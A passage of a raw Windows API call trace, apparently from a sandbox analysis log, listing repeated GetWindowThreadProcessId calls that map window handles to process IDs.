	[0707.099] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b34
	[0707.099] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1b64
	[0707.099] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1bb0
	[0707.099] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1acc
	[0707.100] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1a2c
	[0707.100] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x19a8
	[0707.100] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1944
	[0707.100] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x18c8
	[0707.100] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x18ac
	[0707.100] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x18ec
	[0707.100] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1898
	[0707.101] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc98
	[0707.101] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x153c
	[0707.101] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1808
	[0707.101] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x12a4
	[0707.101] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1740
	[0707.101] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16c4
	[0707.101] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1820
	[0707.101] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16ac
	[0707.102] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1858
	[0707.102] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1664
	[0707.102] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10b4
	[0707.102] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10ac
	[0707.102] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10ec
	[0707.102] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1068
	[0707.102] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x17e0
	[0707.103] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x102c
	[0707.103] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x17a4
	[0707.103] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1050
	[0707.103] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1694
	[0707.103] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1770
	[0707.103] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1720
	[0707.103] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x165c
	[0707.103] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1578
	[0707.104] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x16c0
	[0707.104] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x161c
	[0707.104] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1638
	[0707.104] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x15c8
	[0707.104] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1554
	[0707.104] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1674
	[0707.104] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1520
	[0707.105] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x14bc
	[0707.105] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf8c
	[0707.105] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe9c
	[0707.105] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1434
	[0707.105] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x14ec
	[0707.105] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xfcc
	[0707.106] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x12ac
	[0707.106] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1484
	[0707.106] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x934
	[0707.106] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc0c
	[0707.106] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb08
	[0707.106] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x948
	[0707.106] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1178
	[0707.106] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x13e0
	[0707.107] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xcd0
	[0707.107] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x13fc
	[0707.107] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xdc8
	[0707.107] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc18
	[0707.107] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc2c
	[0707.107] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa1c
	[0707.107] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1244
	[0707.108] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xdb0
	[0707.108] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1398
	[0707.108] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1358
	[0707.108] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1370
	[0707.108] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1340
	[0707.108] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x130c
	[0707.108] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x12c0
	[0707.108] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x12e4
	[0707.109] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1270
	[0707.109] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1298
	[0707.109] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x120c
	[0707.109] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x122c
	[0707.109] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x11c4
	[0707.109] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x11b0
	[0707.109] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1188
	[0707.110] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1148
	[0707.110] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1160
	[0707.110] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x10fc
	[0707.110] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe34
	[0707.110] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xea4
	[0707.110] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x514
	[0707.110] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe48
	[0707.110] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xbc8
	[0707.111] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xdf8
	[0707.111] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x318
	[0707.111] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xcac
	[0707.111] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x8bc
	[0707.111] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf9c
	[0707.111] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf48
	[0707.111] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe40
	[0707.111] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xecc
	[0707.112] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xeb8
	[0707.112] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe80
	[0707.112] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe98
	[0707.112] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe60
	[0707.112] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xee4
	[0707.112] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xf00
	[0707.112] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xdf0
	[0707.113] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xe1c
	[0707.113] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xdd0
	[0707.113] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xd94
	[0707.113] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xd74
	[0707.113] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xd00
	[0707.113] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xcd8
	[0707.113] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc84
	[0707.114] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xca4
	[0707.114] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc64
	[0707.114] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xc24
	[0707.114] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb84
	[0707.114] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xbac
	[0707.114] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x384
	[0707.114] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xab8
	[0707.114] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x33c
	[0707.115] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa44
	[0707.115] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa64
	[0707.115] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x8a8
	[0707.115] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xaf0
	[0707.115] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x88c
	[0707.115] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb04
	[0707.115] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x910
	[0707.116] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x230
	[0707.116] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xac0
	[0707.116] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xab4
	[0707.116] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xaac
	[0707.116] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x3d0
	[0707.116] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x978
	[0707.116] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa7c
	[0707.117] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x59c
	[0707.117] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa88
	[0707.117] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa6c
	[0707.117] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa68
	[0707.117] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x9f8
	[0707.117] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xa04
	[0707.117] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x924
	[0707.117] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x8dc
	[0707.118] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x7dc
	[0707.118] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x768
	[0707.118] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x764
	[0707.118] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x820
	[0707.118] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x810
	[0707.118] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x794
	[0707.118] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x83c
	[0707.118] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x7ac
	[0707.119] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb44
	[0707.119] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x6bc
	[0707.119] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb5c
	[0707.119] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x838
	[0707.119] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.119] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.119] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.119] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0707.120] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.041] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.042] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.042] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.042] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x818
	[0710.042] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x5b8
	[0710.042] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x494
	[0710.042] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x1ec
	[0710.042] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x440
	[0710.042] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x7e8
	[0710.043] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x730
	[0710.043] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x2c8
	[0710.043] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x31c
	[0710.043] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x330
	[0710.043] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x128
	[0710.043] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x5c8
	[0710.043] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x6f8
	[0710.044] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x358
	[0710.044] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x73c
	[0710.044] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0xb0
	[0710.044] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x250
	[0710.044] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x240
	[0710.044] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x790
	[0710.044] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x61c
	[0710.044] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x540
	[0710.045] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x538
	[0710.045] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x568
	[0710.045] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x538
	[0710.045] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x568
	[0710.045] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x538
	[0710.045] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x540
	[0710.045] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x540
	[0710.046] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x57c
	[0710.046] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x460
	[0710.046] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x554
	[0710.046] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.046] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x528
	[0710.046] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.046] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.046] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.047] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x79c
	[0710.047] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
	[0710.047] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4e0
	[0710.047] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1adb00 | out: lpdwProcessId=0x1adb00) returned 0x4d0
